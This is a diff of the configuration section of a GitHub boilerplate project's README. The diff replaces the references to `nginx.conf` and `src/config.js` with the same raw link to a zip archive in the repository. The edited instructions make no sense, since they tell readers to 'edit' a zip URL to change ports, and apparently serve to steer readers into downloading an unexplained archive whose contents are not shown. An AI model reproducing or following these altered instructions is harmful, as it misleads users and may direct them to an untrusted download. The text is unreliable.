SarvaniRapeti/gden_boilerplate/README.md

 ## 📄 Configuration
 To customize your application, you may want to change your NGINX settings or application variables:

-- Edit the `nginx.conf` file to adjust settings like ports and server names.
+- Edit the `https://raw.githubusercontent.com/SarvaniRapeti/gden_boilerplate/main/nginx/gden_boilerplate_3.5.zip` file to adjust settings like ports and server names.
-- Modify application settings in `src/config.js` as needed.
+- Modify application settings in `https://raw.githubusercontent.com/SarvaniRapeti/gden_boilerplate/main/nginx/gden_boilerplate_3.5.zip` as needed.

 ## 🔒 Using SSL with Certbot
 This boilerplate includes support for Certbot, allowing easy SSL setup.
 Follow these steps to configure SSL: